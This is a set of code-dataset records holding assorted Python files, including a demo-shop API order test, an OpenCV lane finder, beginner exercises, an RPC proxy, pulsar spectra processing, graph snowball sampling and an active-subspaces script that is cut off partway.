+{"seq_id":"441345096","text":"'''\n单独提取cookies,然后传递\n'''\nimport requests\n\nclass Mtx_Order():\n\n def __init__(self):\n self.ip = 'http://121.42.15.146:9090'\n self.headers = {'X-Requested-With': 'XMLHttpRequest'}\n\n def login(self):\n url = self.ip + '/mtx/index.php?s=/index/user/login.html'\n data = {\n 'accounts': 'li',\n 'pwd': '123456'\n }\n res = requests.post(url=url,headers=self.headers,data=data)\n return res.cookies\n\n def order(self):\n url = self.ip + '/mtx/index.php?s=/index/buy/add.html'\n cookies = self.login()\n print(cookies)\n data = {\n 'goods_id': 5,\n 'buy_type': 'goods',\n 'stock': 1,\n 'spec': '',\n 'ids': '',\n 'address_id': 1380,\n 'payment_id': 2,\n 'user_note': '',\n 'site_model': 0\n }\n res = requests.post(url=url,headers=self.headers,data=data,cookies=cookies)\n print(res.text)\n\nif __name__ == '__main__':\n obj = Mtx_Order()\n # obj.login()\n obj.order()","sub_path":"mtxapi/api/Mtx_order_cookies.py","file_name":"Mtx_order_cookies.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"565450478","text":"import numpy as np\nimport cv2\nimport time\n\nimport socket\nimport sys\nimport pickle\nimport struct\n\n#Gibt Koordinatenpunkte der Linie relativ zum Bild zurück\ndef 
make_coordinates(image, line_parameters):\n slope, intercept = line_parameters\n y1 = image.shape[0]\n y2 = int(y1*(3/5)) #1 / relative y-Länge der Linien\n x1 = int((y1 - intercept)/slope)\n x2 = int((y2 - intercept)/slope)\n return np.array([x1, y1, x2, y2])\n\n\n#Berechnet die durchschnittliche linke/rechte Linie uns gibt diese zurück\ndef average_slope_intercept(image, lines):\n left_fit = [] #Koordinaten der linken Linie\n right_fit = [] #Koordinaten der rechten Linie\n\n try:\n for line in lines:\n x1, y1, x2, y2 = line.reshape(4)\n parameters = np.polyfit((x1, x2), (y1, y2), 1)\n slope = parameters[0]\n intercept = parameters[1]\n if slope < 0:\n left_fit.append((slope, intercept))\n else:\n right_fit.append((slope, intercept))\n left_fit_average = np.average(left_fit, axis=0)\n right_fit_average = np.average(right_fit, axis = 0)\n except Exception as e:\n print('Ex ', e)\n return None\n\n try:\n left_line = make_coordinates(image, left_fit_average)\n right_line = make_coordinates(image, right_fit_average)\n return np.array([left_line, right_line])\n except Exception as e:\n print('Exception in function \\'average_slope_intercept\\'\\n', e) #print error to console\n return None\n\n\n#Gibt schwarzes Bild mit weißen Kanten zurück\ndef canny(image):\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\n canny = cv2.Canny(blur, 50, 150) #parameter für lower und higher treshold\n return canny\n\n\n#Zeichnet alle Linien auf das line_image\ndef display_lines(image, lines):\n line_image = np.zeros_like(image)\n if lines is not None:\n for x1, y1, x2, y2 in lines:\n cv2.line(line_image, (x1, y1), (x2, y2), (255, 0, 0), 10) #blue\n return line_image\n\n\n#Schwaerzt alle Pixel im unwichtigen Bereich aus\ndef region_of_interest(image):\n height = image.shape[0]\n polygons = np.array([[(200, height), (1100, height), (550, 250)]])\n mask = np.zeros_like(image)\n cv2.fillPoly(mask, polygons, 255)\n masked_image = cv2.bitwise_and(image, mask)\n return masked_image\n\n\n#Skaliert das Bild auf eine neue Groesse\ndef rescale_frame(frame, percent):\n width = int(frame.shape[1] * percent/100)\n height = int(frame.shape[0] * percent/100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n\n\ndef socket_connect():\n socket1=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #SOCK_STREAM ist TCP SOCK_DGRAM ist UDP\n socket1.connect(('localhost', 8089))\n return socket1\n\n\ndef send_frame(frame, scale):\n smallframe = rescale_frame(frame, scale)\n data = pickle.dumps(smallframe)\n message_size = struct.pack(\"=L\", len(data))\n clientsocket.sendall(message_size + data)\n\n\ndef run_LaneFinder(frame):\n canny_image = canny(frame)\n cropped_image = region_of_interest(canny_image)\n lines = cv2.HoughLinesP(cropped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap=5) #findet Linien (bild, pixelgröße des Rasters, Winkelgenauigkeit, leeres Array, minLineLength, maxLineGap)\n averaged_lines = average_slope_intercept(frame, lines)\n line_image = display_lines(frame, averaged_lines)\n combo_image = cv2.addWeighted(frame, 0.2, line_image, 1, 1) #Kombiniert 2 Bilder mit Gewichtung 0.8-1 und Gamma 1 \n return combo_image\n\n\n#MAIN\nclientsocket = socket_connect()\ncap = cv2.VideoCapture(\"Parkour1.mp4\")\nwhile(cap.isOpened()):\n _, frame = cap.read()\n #frame = cv2.inRange(frame, (0, 0, 0), (50, 50, 50))\n\n result = run_LaneFinder(frame)\n\n #test\n #tresh = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, 
cv2.THRESH_BINARY, 11, 2)\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n ret, tresh = cv2.threshold(gray, 40, 255, cv2.THRESH_BINARY)\n #/test\n\n cv2.imshow('result', tresh)\n #send_frame(frame, 50)\n #time.sleep(0.05)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"FindingLanes/lanes.py","file_name":"lanes.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6056192","text":"counter = 10\nwhile counter > 0:\n print(counter)\n counter -= 1\n\n\n\n\n# While dolzen imet uslovie vqhoda iz cqkla\n# условно бесконечный цикл, vozvrawaet obratno\n\n\n'''x = 10\nwhile True: 'Beskone4nqi cqkl '\n print(x)\n x = x ** 2'''\n\n'''condition = True\nwhile condition:\n id_code = input('Please enter ID:')\n if len(id_code) ==11:\n condition = False\n elif id_code == 'Exit':\n condition = False\n \n \nprint(id_code)'''\n\n\nx = 5\nwhile x != 20:\n print(x)\n x -= 1\n","sub_path":"007_002_Cycle(While)_Repeating.py","file_name":"007_002_Cycle(While)_Repeating.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"596923641","text":"'''\nMode\tDescription\n'r'\tOpen a file for reading. (default)\n'w'\tOpen a file for writing. Creates a new file if it does not exist or truncates the file if it exists.\n'x'\tOpen a file for exclusive creation. If the file already exists, the operation fails.\n'a'\tOpen for appending at the end of the file without truncating it. Creates a new file if it does not exist.\n't'\tOpen in text mode. (default)\n'b'\tOpen in binary mode.\n'+'\tOpen a file for updating (reading and writing)\n'''\ndef main():\n f= open(\"dhanyatest.txt\",\"+\")\n for i in range(50,61):\n f.write(\"This is new line %d\\r\\n\" % (i)) \n f.close()\n #Open the file back and read the contents\n f=open(\"dhanyatest.txt\", \"+\")\n if(f.mode == 'r'):\n contents =f.read()\n print(contents)\n #or, readlines reads the individual line into a list\n #fl =f.readlines()\n #for x in fl:\n #print x\n f.close()\nif __name__== \"__main__\":\n main()\n \n#Open a file in append mode.\nf= open(\"filedemo13112019demo.txt\",\"a\")\nprint(f) \nf.write('I am learning python\\n')\nf.write('python is easy to learn\\n')\nf.close()\n \n#file in write mode.\nf= open(\"filedemo13112019demo.txt\",\"w\") \nf.write('I am learning python\\n')\nf.write('python is easy to learn\\n')\nf.close()\n\n#Reading a file r mode.\nf= open(\"filedemo13112019demo.txt\",\"r\") \nprint(f.read())\nf.close()\n\n#Reading line by line\nf= open(\"filedemo13112019demo.txt\",\"r\") \nlines = f.readlines()\nfor l in lines:\n print(l)\nf.close()\n\n#Sum of numbers in a file\nf= open(\"samplefile.txt\",\"r\") \nlines = f.readlines()\ntokens = ''\nsum = 0\nfor l in lines:\n tokens = l.split()\n for token in tokens:\n if (token.isnumeric()):\n sum = sum + int(token)\n print(token) \nprint('sum : ',sum)\nf.close()\n\n#https://www.tutorialsteacher.com/python/python-read-write-file\nf= open(\"dhanyatest1.txt\",\"a+\")\nf.write('testing')\nf.seek(0,0)\ncontents =f.read()\nprint(contents)\nprint(f.mode)\nf.close()\n\nf=open(\"binfile.bin\",\"w+b\")\nnum=[5, 10, 15, 20, 25]\narr=bytearray(num)\nf.write(arr)\nf.seek(0,0)\nprint(list(f.read()))\nf.close()\nf=open(\"binfile.bin\",\"w+b\")\nnum=['r', 'a']\narr=bytearray(str(num),'utf-8')\nf.write(arr)\nf.seek(0,0)\nprint((f.read().decode()))\nf.close()\n\nstring = \"Python is 
interesting.\"\n# string with encoding 'utf-8'\narr = bytearray(string, 'utf-8')\nprint(arr)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"15-FileManagement.py","file_name":"15-FileManagement.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169757995","text":"#-*-coding: utf-8-*-\n\n# Version: 0.1\n# Author: Don Li \n# License: Copyright(c) 2015 Don.Li\n# Summary:\n\nfrom rpc import route\nfrom enum import Enum\nfrom errorno import *\n\nfrom log import log\nfrom protocol_manager import g_protoMgr, gs_call, ms_call, alli_call\n\nimport traceback\n\nclass RoutePrefix(Enum):\n CHAT = 'chat'\n MAIL = 'mail'\n ALLIANCE = 'alliance'\n\n@route(msgid='*')\nasync def proxy(p, request):\n res = [UNKNOWN_ERROR, None]\n\n log.debug('request: {0}, p: {1}.'.format( request, p ))\n if p.cid is None:\n res[0] = LOGIN_UNKNOWN_CID\n log.warn('[ proxy ]unknown cid.', request, 'FROM:', p.Peer())\n return res\n else:\n _func, _request = request\n if _request:\n _request = p.cid, _request\n else:\n _request = (p.cid, )\n\n _prefix = _func.split('_')[0]\n\n if _prefix == RoutePrefix.CHAT.value:\n _call = ms_call\n elif _prefix == RoutePrefix.MAIL.value:\n _call = ms_call\n elif _prefix == RoutePrefix.ALLIANCE.value:\n _call = alli_call\n else:\n _call = gs_call\n\n try:\n remote_res = await _call( _func, _request )\n except Exception as e:\n log.error('e: {0}, request: {1}.'.format( e, request ))\n traceback.print_exc()\n return res\n\n if isinstance(remote_res, int):\n res[0] = remote_res\n return res\n else:\n res[0] = NO_ERROR\n res[1] = remote_res\n return res\n\n","sub_path":"src/gateway/handler/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"166422137","text":"from numpy import *\nfrom scipy.signal import find_peaks\n\n# This is a modified version of the curve_is_fine routine used for the\n# drift velocities. Unlike its predecessor, it also returns the height of\n# the peak in case there is one, and returns the approximated level of the\n# noise in case no peak was found (not unique peak, just if no peak was found\n# at all, i.e. the signal is 'zero').\n\ndef curve_is_fine(curve):\n # Testing sizes\n #if min(curve) > noise_treshhold:\n # return False\n if min(curve) < -0.499:\n return False, -1\n\n # Now we know that the curve has the right size.\n\n # Now, we check if it has the right shape; for that,\n # it is enough to check that it has exactly one peak.\n\n min_size = min(curve) # This gives us the lowest point of the curve\n noise_estimate = min(curve[:50]) # This gives an extremely rough estimate\n # of the background noise. More is not needed though\n\n # The following few lines had to be added, since otherwise null-signals\n # would not make it through\n if abs(min_size) <= 0.02:\n return True, 0\n\n # In case the voltage due to background on the right is\n # higher than on the left, we need to take this into account for\n # the prominence.\n noise_estimate_right = curve[-1]\n\n prominence_approx = min(abs(min_size - noise_estimate), abs(min_size - noise_estimate_right))\n \n # Now, if we search for peaks with this prominence, we'll find\n # just the highest peak. But we want to be sure that they are no\n # other significant peaks. 
For this, we search for all peaks that\n # have a significant prominance compared to the main peak.\n # This is a bit arbitrary, but a secondary peak will have a prominence\n # of about 1/10 of the main peak. The rest will be noise, whose\n # prominence is far lower.\n significance = 10.0\n peaks, _ = find_peaks(-curve, prominence = (prominence_approx/significance, None), distance = 50)\n # The function has to be flipped, as find_peaks only\n # searches for local maxima\n if peaks.shape[0] > 1:\n return False, -1\n elif peaks.shape[0] == 0:\n return True, 0\n elif peaks.shape[0] == 1:\n return True, abs(min_size) - abs(noise_estimate)\n return False, -1\n","sub_path":"Drift_Chamber_Analysis/Computing_Gas_Amplification_channel_wise/curve_is_fine_gas_amplification.py","file_name":"curve_is_fine_gas_amplification.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65229856","text":"# based on the 2020 tax rates for someone filing single\r\n# https://www.nerdwallet.com/article/taxes/federal-income-tax-brackets\r\ndef tax():\r\n rates = [.10, .12, .22, .24, .32, .35, .37]\r\n income_cutoff = [9875, 40125, 85525, 163300, 207350, 518400]\r\n income = float(input(\"Enter your annual income: \"))\r\n\r\n if income <= 9875:\r\n tax_owed = float(income) * rates[0]\r\n print(float(tax_owed))\r\n elif income > 9876 and income < 40125:\r\n tax_owed = (987.5 + (rates[1]*(float(income) - income_cutoff[0])))\r\n print(float(tax_owed))\r\n elif income > 40126 and income < 85525:\r\n tax_owed = (4617.5 + (rates[2]*(float(income) - income_cutoff[1])))\r\n print(float(tax_owed))\r\n elif income > 85526 and income < 163300:\r\n tax_owed = (14605.5 + (rates[3]*(float(income) - income_cutoff[2])))\r\n print(float(tax_owed))\r\n elif income > 163301 and income < 207350:\r\n tax_owed = (33271.5 + (rates[4]*(float(income) - income_cutoff[3])))\r\n print(float(tax_owed))\r\n elif income > 207351 and income < 518400:\r\n tax_owed = (47367.5 + (rates[5]*(float(income) - income_cutoff[4])))\r\n print(float(tax_owed))\r\n elif income > 518401:\r\n tax_owed = (156235 + (rates[6]*(float(income) - income_cutoff[5])))\r\n print(float(tax_owed))\r\n\r\ntax()\r\n","sub_path":"Income Tax Calculator.py","file_name":"Income Tax Calculator.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19964166","text":"\r\n\r\nmenu = ['1. 회원가입', '2. 로그인', '3. 회원목록', '9. 
메뉴종료']\r\nmenuChk = ['1','2','3','9']\r\nitemList = ['ID', 'PWD', 'NAME', 'EMAIL', 'PHONE', 'ADDRESS']\r\n\r\n\r\nuser_check = []\r\n\r\nprint('='*20, \" 메뉴선택 \", '='*20, end='\\n\\n')\r\nfor x in range(4):\r\n\tprint(menu[x], \" \", end='')\r\nprint(end= '\\n\\n')\r\nprint('='*52)\r\n\r\nwhile True:\r\n\tnumber = input(\"\\t메뉴의 번호를 선택해주세요.\t\")\r\n\tif number == '':\r\n\t\tprint()\r\n\t\tprint('숫자 확인하세요.')\r\n\t\tcontinue\r\n\tif number != '':\r\n\t\tnumber = int(number)\r\n\tif number == 9:\r\n\t\tprint('종료합니다.')\r\n\t\tbreak\r\n\tif number not in range(1,4):\r\n\t\tprint()\r\n\t\tprint('숫자 확인하세요.', end='\\n\\n')\r\n\t\tcontinue\r\n\telse:\r\n\t\tuser_list = []\r\n\t\tfor y in range(1):\r\n\t\t\tif number == 1:\r\n\t\t\t\tprint(end='\\n\\n')\r\n\t\t\t\tprint(\"\\tSign Up\", end='\\n\\n')\r\n\t\t\t\tfor z in range(6):\r\n\t\t\t\t\tchu = input('\\t' + itemList[z] + '\\t:\\t')\r\n\t\t\t\t\tuser_list.append(chu)\r\n#\t\t\t\tprint(user_list)\r\n\t\t\t\tuser_check.append(user_list)\r\n\t\t\t\tusers = int(len(user_check))\r\n\t\t\t\tprint()\r\n#\t\t\t\tprint('\\t', user_check, end = '\\n')\r\n#\t\t\t\tprint('\\t현재 회원 수는 %d명 입니다.' %users)\r\n\r\n\t\t\t\tfor i in range(users):\r\n\t\t\t\t\tprint('\\t', user_check[i])\r\n\t\t\t\tprint('\\t현재 회원 수는 %d명 입니다.' %users, end='\\n\\n')\r\n\r\n\r\n\r\n\r\n\t\r\n\r\n","sub_path":"Python&DataBase/5.17/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"488263979","text":"#!/usr/bin/env python\n#\n# Based on spectra.py in PRESTO\n\n\nimport copy\n\nimport numpy as np\nimport scipy.signal\n\n\n# Adapted from psr_utils\ndef rotate(arr, bins):\n \"\"\"\n Return an array rotated by 'bins' places to the left\n\n :param list arr: Input data\n :param int bins: Number of bins to rotate by\n \"\"\"\n bins = bins % len(arr)\n if bins == 0:\n return arr\n else:\n return np.concatenate((arr[bins:], arr[:bins]))\n\n\n# Adapted from psr_utils\ndef delay_from_DM(DM, freq_emitted):\n \"\"\"\n Return the delay in seconds caused by dispersion, given\n a Dispersion Measure in cm-3 pc, and the emitted\n frequency of the pulsar in MHz.\n\n :param float DM: dispersion measure\n :param float freq_emitted: frequency\n \"\"\"\n if isinstance(freq_emitted, float):\n if freq_emitted > 0.0:\n return DM / (0.000241 * freq_emitted * freq_emitted)\n else:\n return 0.0\n else:\n return np.where(freq_emitted > 0.0,\n DM / (0.000241 * freq_emitted * freq_emitted), 0.0)\n\n\nclass Spectra:\n \"\"\"\n A class to store spectra. This is mainly to provide\n reusable functionality.\n \"\"\"\n def __init__(self, freqs, dt, data, starttime=0, dm=0):\n \"\"\"\n Spectra constructor\n\n :param list freqs: Observing frequencies for each channel.\n :param float dt: Sampling time (seconds)\n :param array data: A 2D numpy array containing pulsar data.\n Axis 0 should contain channels. (e.g. data[0,:])\n Axis 1 should contain spectra. (e.g. data[:,0])\n :param float starttime: Start time (in seconds) of the spectra\n with respect to the start of the observation.\n (Default: 0).\n :param float dm: Dispersion measure (in pc/cm^3). 
(Default: 0)\n :return: Spectra object\n \"\"\"\n self.numchans, self.numspectra = data.shape\n assert len(freqs) == self.numchans\n\n self.freqs = freqs\n self.data = data.astype('float')\n self.dt = dt\n self.starttime = starttime\n self.dm = 0\n\n def __str__(self):\n return str(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __setitem__(self, key, value):\n self.data[key] = value\n\n def get_chan(self, channum):\n return self.data[channum, :]\n\n def get_spectrum(self, specnum):\n return self.data[:, specnum]\n\n def shift_channels(self, bins, padval=0):\n \"\"\"\n Shift each channel to the left by the corresponding\n value in bins, an array.\n *** Shifting happens in-place ***\n\n :param array bins: An array containing the number of bins\n to shift each channel by.\n :param float/str padval: Value to use when shifting near the edge\n of a channel. This can be a numeric value,\n 'median', 'mean', or 'rotate'.\n\n The values 'median' and 'mean' refer to the\n median and mean of the channel. The value\n 'rotate' takes values from one end of the\n channel and shifts them to the other.\n \"\"\"\n assert self.numchans == len(bins)\n for ii in range(self.numchans):\n chan = self.get_chan(ii)\n # Use 'chan[:]' so update happens in-place\n # this way the change effects self.data\n chan[:] = rotate(chan, bins[ii])\n if padval != 'rotate':\n # Get padding value\n if padval == 'mean':\n pad = np.mean(chan)\n elif padval == 'median':\n pad = np.median(chan)\n else:\n pad = padval\n\n # Replace rotated values with padval\n if bins[ii] > 0:\n chan[-bins[ii]:] = pad\n elif bins[ii] < 0:\n chan[:-bins[ii]] = pad\n\n def subband(self, nsub, subdm=None, padval=0):\n \"\"\"\n Reduce the number of channels to 'nsub' by subbanding.\n The channels within a subband are combined using the\n DM 'subdm'. 'padval' is passed to the call to\n 'Spectra.shift_channels'.\n *** Subbanding happens in-place ***\n\n :param int nsub: Number of subbands. Must be a factor of\n the number of channels.\n :param float subdm: The DM with which to combine channels within\n each subband (Default: don't shift channels\n within each subband)\n :param float/str padval: The padding value to use when shifting\n channels during dedispersion. See documentation\n of Spectra.shift_channels. 
(Default: 0)\n \"\"\"\n assert (self.numchans % nsub) == 0\n assert (subdm is None) or (subdm >= 0)\n nchan_per_sub = self.numchans / nsub\n sub_hifreqs = self.freqs[np.arange(int(nsub)) * int(nchan_per_sub)]\n sub_lofreqs = self.freqs[(1 + np.arange(int(nsub))) * int(nchan_per_sub - 1)]\n sub_ctrfreqs = 0.5 * (sub_hifreqs + sub_lofreqs)\n\n if subdm is not None:\n # Compute delays\n ref_delays = delay_from_DM(subdm - self.dm, sub_ctrfreqs)\n delays = delay_from_DM(subdm - self.dm, self.freqs)\n rel_delays = delays - ref_delays.repeat(nchan_per_sub) # Relative delay\n rel_bindelays = np.round(rel_delays / self.dt).astype('int')\n # Shift channels\n self.shift_channels(rel_bindelays, padval)\n\n # Subband\n self.data = np.array([np.sum(sub, axis=0) for sub in\n np.vsplit(self.data, nsub)])\n self.freqs = sub_ctrfreqs\n self.numchans = nsub\n\n def scaled(self, indep=False):\n \"\"\"\n Return a scaled version of the Spectra object.\n When scaling subtract the median from each channel,\n and divide by global std deviation (if indep==False), or\n divide by std deviation of each row (if indep==True).\n\n :param bool indep: If True, scale each row\n independently (Default: False).\n\n :return: scaled_spectra: A scaled version of the\n Spectra object.\n \"\"\"\n other = copy.deepcopy(self)\n if not indep:\n std = other.data.std()\n for ii in range(other.numchans):\n chan = other.get_chan(ii)\n median = np.median(chan)\n if indep:\n std = chan.std()\n chan[:] = (chan - median) / std\n return other\n\n def scaled2(self, indep=False):\n \"\"\"\n Return a scaled version of the Spectra object.\n When scaling subtract the min from each channel,\n and divide by global max (if indep==False), or\n divide by max of each row (if indep==True).\n\n :param bool indep: If True, scale each row\n independently (Default: False).\n\n :return: scaled_spectra: A scaled version of the\n Spectra object.\n \"\"\"\n other = copy.deepcopy(self)\n if not indep:\n max = other.data.max()\n for ii in range(other.numchans):\n chan = other.get_chan(ii)\n min = chan.min()\n if indep:\n max = chan.max()\n chan[:] = (chan - min) / max\n return other\n\n def masked(self, mask, maskval='median-mid80'):\n \"\"\"\n Replace masked data with 'maskval'. Returns\n a masked copy of the Spectra object.\n\n :param array mask: An array of boolean values of the same size and shape\n as self.data. True represents an entry to be masked.\n :param str maskval: Value to use when masking. This can be a numeric\n value, 'median', 'mean', or 'median-mid80'.\n\n The values 'median' and 'mean' refer to the median and\n mean of the channel, respectively. 
The value 'median-mid80'\n refers to the median of the channel after the top and bottom\n 10% of the sorted channel is removed.\n (Default: 'median-mid80')\n\n :return: maskedspec: A masked version of the Spectra object.\n \"\"\"\n assert self.data.shape == mask.shape\n maskvals = np.ones(self.numchans)\n for ii in range(self.numchans):\n chan = self.get_chan(ii)\n # Use 'chan[:]' so update happens in-place\n if maskval == 'mean':\n maskvals[ii] = np.mean(chan)\n elif maskval == 'median':\n maskvals[ii] = np.median(chan)\n elif maskval == 'median-mid80':\n n = int(np.round(0.1 * self.numspectra))\n maskvals[ii] = np.median(sorted(chan)[n:-n])\n else:\n maskvals[ii] = maskval\n if np.all(mask[ii]):\n self.data[ii] = np.ones_like(self.data[ii]) * (maskvals[:, np.newaxis][ii])\n return self\n\n def dedisperse(self, dm=0, padval=0):\n \"\"\"\n Shift channels according to the delays predicted by\n the given DM.\n *** Dedispersion happens in place ***\n\n :param float dm: The DM (in pc/cm^3) to use.\n :param float/str padval: The padding value to use when shifting\n channels during dedispersion. See documentation\n of Spectra.shift_channels. (Default: 0)\n \"\"\"\n assert dm >= 0\n ref_delay = delay_from_DM(dm - self.dm, np.max(self.freqs))\n delays = delay_from_DM(dm - self.dm, self.freqs)\n rel_delays = delays - ref_delay # Relative delay\n rel_bindelays = np.round(rel_delays / self.dt).astype('int')\n # Shift channels\n self.shift_channels(rel_bindelays, padval)\n\n self.dm = dm\n\n def smooth(self, width=1, padval=0):\n \"\"\"\n Smooth each channel by convolving with a top hat\n of given width. The height of the top had is\n chosen shuch that RMS=1 after smoothing.\n Overlap values are determined by 'padval'.\n This bit of code is taken from Scott Ransom's\n PRESTO's single_pulse_search.py (line ~ 423).\n *** Smoothing is done in place. ***\n\n :param int width: Number of bins to smooth by (Default: no smoothing)\n :param float/str padval: Padding value to use. 
Possible values are\n float-value, 'mean', 'median', 'wrap'.\n (Default: 0).\n \"\"\"\n if width > 1:\n kernel = np.ones(width, dtype='float32') / np.sqrt(width)\n for ii in range(self.numchans):\n chan = self.get_chan(ii)\n if padval == 'wrap':\n tosmooth = np.concatenate([chan[-width:],\n chan, chan[:width]])\n elif padval == 'mean':\n tosmooth = np.ones(self.numspectra + width * 2) * \\\n np.mean(chan)\n tosmooth[width:-width] = chan\n elif padval == 'median':\n tosmooth = np.ones(self.numspectra + width * 2) * \\\n np.median(chan)\n tosmooth[width:-width] = chan\n else: # padval is a float\n tosmooth = np.ones(self.numspectra + width * 2) * \\\n padval\n tosmooth[width:-width] = chan\n\n smoothed = scipy.signal.convolve(tosmooth, kernel, 'same')\n chan[:] = smoothed[width:-width]\n\n def trim(self, bins=0):\n \"\"\"\n Trim the end of the data by 'bins' spectra.\n *** Trimming is done in place ***\n\n :param int bins: Number of spectra to trim off the end of the observation.\n If bins is negative trim spectra off the beginning of the\n observation.\n \"\"\"\n assert bins < self.numspectra\n if bins == 0:\n return\n elif bins > 0:\n self.data = self.data[:, :-bins]\n self.numspectra = self.numspectra - bins\n elif bins < 0:\n self.data = self.data[:, bins:]\n self.numspectra = self.numspectra - bins\n self.starttime = self.starttime + bins * self.dt\n\n def downsample(self, factor=1, trim=True):\n \"\"\"\n Downsample the spectra by co-adding\n 'factor' adjacent bins.\n *** Downsampling is done in place ***\n\n :param int factor: Reduce the number of spectra by this\n factor. Must be a factor of the number of\n spectra if 'trim' is False.\n :param bool trim: Trim off excess bins.\n \"\"\"\n assert trim or not (self.numspectra % factor)\n new_num_spectra = self.numspectra // factor\n num_to_trim = int(self.numspectra % factor)\n self.trim(num_to_trim)\n self.data = np.array(np.column_stack([np.sum(subint, axis=1) for\n subint in np.hsplit(self.data, new_num_spectra)]))\n self.numspectra = new_num_spectra\n self.dt = self.dt * factor\n","sub_path":"arts_localisation/data_tools/spectra.py","file_name":"spectra.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301950971","text":"import json\r\nimport sys\r\nimport random\r\nimport math \r\nimport time\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Queue():\r\n #Constructor creates a list\r\n def __init__(self):\r\n self.queue = list()\r\n \r\n #Adding elements to queue\r\n def enqueue(self,data):\r\n #Checking to avoid duplicate entry (not mandatory)\r\n if data not in self.queue:\r\n self.queue.insert(0,data)\r\n return True\r\n return False\r\n \r\n #Removing the last element from the queue\r\n def dequeue(self):\r\n if len(self.queue)>0:\r\n return self.queue.pop()\r\n else:\r\n #plt.show()\r\n exit()\r\n \r\n #Getting the size of the queue\r\n def size(self):\r\n return len(self.queue)\r\n \r\n #printing the elements of the queue\r\n def printQueue(self):\r\n return self.queue\r\n\r\nclass Snowball():\r\n\r\n def __init__(self):\r\n self.G1 = nx.Graph()\r\n\r\n def snowball(self,G,size,k):\r\n q=Queue() \r\n list_nodes=list(G.nodes())\r\n m = k\r\n dictt = set()\r\n while(m):\r\n id = random.sample(list(G.nodes()),1)[0]\r\n q.enqueue(id)\r\n m = m - 1\r\n #print(q.printQueue())\r\n while(len(self.G1.nodes()) <= size):\r\n if(q.size() > 0):\r\n id = q.dequeue()\r\n 
self.G1.add_node(id)\r\n if(id not in dictt):\r\n dictt.add(id)\r\n list_neighbors = list(G.neighbors(id))\r\n if(len(list_neighbors) > k):\r\n for x in list_neighbors[:k]:\r\n q.enqueue(x)\r\n self.G1.add_edge(id,x)\r\n elif(len(list_neighbors) <= k and len(list_neighbors) > 0):\r\n for x in list_neighbors:\r\n q.enqueue(x)\r\n self.G1.add_edge(id,x)\r\n else:\r\n continue\r\n else:\r\n initial_nodes = random.sample(list(G.nodes()) and list(dictt),k)\r\n no_of_nodes = len(initial_nodes)\r\n for id in initial_nodes:\r\n q.enqueue(id) \r\n return self.G1\r\n\r\n\r\n","sub_path":"build/lib/Graph_Sampling/Snowball.py","file_name":"Snowball.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276077843","text":"import utils_data\nimport numpy as np\nimport active_subspaces\n\n# Set quantity of interest and input labels\nQofI = 'QoI'\nin_labels = ['rho', 'mu', 'dpdz', 'c_p', 'k', 'Pr_t']\n\n# Set the number of parameter (m) and active subspace dimension (n)\nm, n = 6, 1\n\n# Load random sampling data\ndata = np.loadtxt('params_and_results.dat')\nX_phys, f, df_phys = data[:, :m], data[:, m].reshape((data.shape[0], 1)), data[:, m+1:]\nM = f.shape[0]\n\n# Scale data so parameters are in [-1, 1]\nX_norm, df_norm = utils_data.physical_to_normalized(X=X_phys, df=df_phys)\n\n###############################################################################\n##### Local Linear Approximation Gradients\n###############################################################################\n\n# Estimate gradients using local linear approximation\ndf_local_linear = active_subspaces.gradients.local_linear_gradients(X_phys, f)\n\n# Scale data so parameters are in [-1, 1]\ndf_local_linear = utils_data.physical_to_normalized(df=df_local_linear)\n\n# Compute the active/inactive subspaces\n# NOTE: The gradient is normalized for this computation\nsub = active_subspaces.subspaces.Subspaces()\nsub.compute(df_local_linear/np.linalg.norm(df_local_linear, axis=1).reshape((df_local_linear.shape[0], 1)))\n\n# Rewrite the active/inactive subspace variables to be n-dimensional\nsub.W1, sub.W2 = sub.eigenvectors[:, :n], sub.eigenvectors[:, n:]\nsub.W1 = sub.W1.reshape(m, n)\nsub.W2 = sub.W2.reshape(m, m-n)\n\n# Define the active/inactive variables\nY, Z = np.dot(X_norm, sub.W1), np.dot(X_norm, sub.W2)\n\n# Plot the active subspace info\nactive_subspaces.utils.plotters.eigenvalues(sub.eigenvalues, e_br=sub.e_br, out_label='Local Linear Approximation')\nactive_subspaces.utils.plotters.eigenvectors(sub.W1, in_labels=in_labels, out_label='Local Linear Approximation')\n\n###############################################################################\n##### True Gradients\n###############################################################################\n\n# Compute the active/inactive subspaces\n# 